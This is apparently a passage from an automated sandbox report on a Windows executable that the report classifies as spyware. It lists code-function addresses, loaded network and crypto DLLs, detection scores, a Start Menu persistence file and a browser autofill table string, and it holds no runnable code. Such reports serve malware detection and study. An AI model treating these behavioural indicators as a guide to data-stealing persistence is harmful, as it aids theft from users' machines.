            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F679BF12_2_37F679BF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F656B812_2_37F656B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F691B812_2_37F691B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6E7B912_2_37F6E7B9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F656A712_2_37F656A7
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F691A712_2_37F691A7
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A9A012_2_37F6A9A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F666A112_2_37F666A1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F62DA812_2_37F62DA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6D4A812_2_37F6D4A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F62D9712_2_37F62D97
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F64D9712_2_37F64D97
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6D49712_2_37F6D497
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6EC9012_2_37F6EC90
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A99112_2_37F6A991
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F64D9812_2_37F64D98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F67E9812_2_37F67E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6128012_2_37F61280
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6968012_2_37F69680
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6248812_2_37F62488
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6C18812_2_37F6C188
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F67E8812_2_37F67E88
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6247712_2_37F62477
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6D97012_2_37F6D970
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6967012_2_37F69670
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6EC7F12_2_37F6EC7F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6447812_2_37F64478
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F66B7812_2_37F66B78
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6C17812_2_37F6C178
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6446712_2_37F64467
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6096012_2_37F60960
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6836012_2_37F68360
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F61B6112_2_37F61B61
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6D96112_2_37F6D961
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6126F12_2_37F6126F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F61B6812_2_37F61B68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6AE6812_2_37F6AE68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F66B6912_2_37F66B69
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6C65012_2_37F6C650
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6095012_2_37F60950
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6835012_2_37F68350
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F63B5812_2_37F63B58
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6F15812_2_37F6F158
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6AE5912_2_37F6AE59
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6004012_2_37F60040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6704012_2_37F67040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6C64112_2_37F6C641
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F65B4812_2_37F65B48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F69B4812_2_37F69B48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F63B4812_2_37F63B48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6F14812_2_37F6F148
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F65B3712_2_37F65B37
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6B33012_2_37F6B330
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6323812_2_37F63238
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6DE3812_2_37F6DE38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F69B3812_2_37F69B38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6F62012_2_37F6F620
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6702F12_2_37F6702F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6522812_2_37F65228
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6882812_2_37F68828
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6322812_2_37F63228
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6DE2912_2_37F6DE29
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6171012_2_37F61710
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A01012_2_37F6A010
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6B31F12_2_37F6B31F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6291812_2_37F62918
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6CB1812_2_37F6CB18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6521812_2_37F65218
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6881812_2_37F68818
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6000612_2_37F60006
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6CB0712_2_37F6CB07
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6E30012_2_37F6E300
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A00112_2_37F6A001
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6290E12_2_37F6290E
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6F60F12_2_37F6F60F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6170A12_2_37F6170A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6490812_2_37F64908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F182812_2_3A3F1828
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FF66812_2_3A3FF668
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F0E9812_2_3A3F0E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F7FA812_2_3A3F7FA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FF98812_2_3A3FF988
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FDA3812_2_3A3FDA38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FF02812_2_3A3FF028
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F8C2812_2_3A3F8C28
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FBE2812_2_3A3FBE28
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F181812_2_3A3F1818
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FD40812_2_3A3FD408
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FA20812_2_3A3FA208
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F000612_2_3A3F0006
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FC46812_2_3A3FC468
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F926812_2_3A3F9268
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FA84812_2_3A3FA848
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FDA4812_2_3A3FDA48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F004012_2_3A3F0040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F82B712_2_3A3F82B7
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FFCA812_2_3A3FFCA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FCAA812_2_3A3FCAA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F98A812_2_3A3F98A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FFC9912_2_3A3FFC99
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FE08812_2_3A3FE088
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FAE8812_2_3A3FAE88
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F0E8712_2_3A3F0E87
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F04F912_2_3A3F04F9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F9EE812_2_3A3F9EE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FD0E812_2_3A3FD0E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F9EDA12_2_3A3F9EDA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FB4C812_2_3A3FB4C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F82C812_2_3A3F82C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FE6C812_2_3A3FE6C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FC13812_2_3A3FC138
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FD72812_2_3A3FD728
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FA52812_2_3A3FA528
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FA51712_2_3A3FA517
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FED0812_2_3A3FED08
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F050812_2_3A3F0508
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F890812_2_3A3F8908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FBB0812_2_3A3FBB08
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F1F6812_2_3A3F1F68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FAB6812_2_3A3FAB68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FDD6812_2_3A3FDD68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F136012_2_3A3F1360
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3FDD5712_2_3A3FDD57
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_3A3F135012_2_3A3F1350
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FC148
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F8F48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FF348
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FE3A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FB1A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FE39A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F7F98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FC788
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F9588
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FD3F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F21F1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FB7E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F85E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FE9E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FE9D9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F85D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FB7D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F09D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F9BC8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3FCDC8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A3F09C2
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A40D3F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A406DA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A406440
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403240
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A400040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A401C50
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A404E51
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A404E60
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A401C60
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A400670
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403871
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A406A71
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A405E00
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A402C00
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A40160F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A404820
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A401620
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403230
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403EC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A400CC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4028CF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A405AD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A405AE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4028E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4044EF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4012F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A406A80
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403880
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A400680
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4054A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4022A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A404B40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A401940
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403550
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403560
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A400360
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A406760
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A408778
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A404500
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A401300
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A40EB18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A406120
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A402F20
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A40192F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A404B31
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4057C0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4025C0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4041E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A400FE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A402BEF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A405DF1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A405180
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A401F80
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403B8F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A400990
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A406D92
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A403BA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4009A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3A4057B0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE37F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE48DA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE2A20
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE2338
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE1530
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE3108
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE0E48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE1C50
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE098A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE37E6
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE0AD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE152C
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE2328
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE0E38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE0006
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE3102
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE0A18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE2A10
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE0040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 12_2_3AAE1C40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: String function: 00402A07 appears 51 times
            Source: axN56TZ3PI.exe Static PE information: invalid certificate
            Source: axN56TZ3PI.exe Static PE information: Resource name: RT_VERSION type: Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
            Source: axN56TZ3PI.exe, 0000000C.00000002.6021727103.0000000070B7B000.00000020.00000001.01000000.0000000C.sdmp Binary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs axN56TZ3PI.exe
            Source: axN56TZ3PI.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/14@5/5
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 0_2_004042E6 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Wull157
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File created: C:\Users\user\AppData\Local\Temp\nst8CF5.tmp
            Source: axN56TZ3PI.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: axN56TZ3PI.exe, 0000000C.00000002.6017612007.00000000390B3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: axN56TZ3PI.exe Virustotal: Detection: 65%
            Source: axN56TZ3PI.exe ReversingLabs: Detection: 57%
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe File read: C:\Users\user\Desktop\axN56TZ3PI.exe
            Source: unknown Process created: C:\Users\user\Desktop\axN56TZ3PI.exe "C:\Users\user\Desktop\axN56TZ3PI.exe"
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Process created: C:\Users\user\Desktop\axN56TZ3PI.exe "C:\Users\user\Desktop\axN56TZ3PI.exe"
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Process created: C:\Users\user\Desktop\axN56TZ3PI.exe "C:\Users\user\Desktop\axN56TZ3PI.exe"
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: edgegdi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\axN56TZ3PI.exe Section loaded: secur32.dll
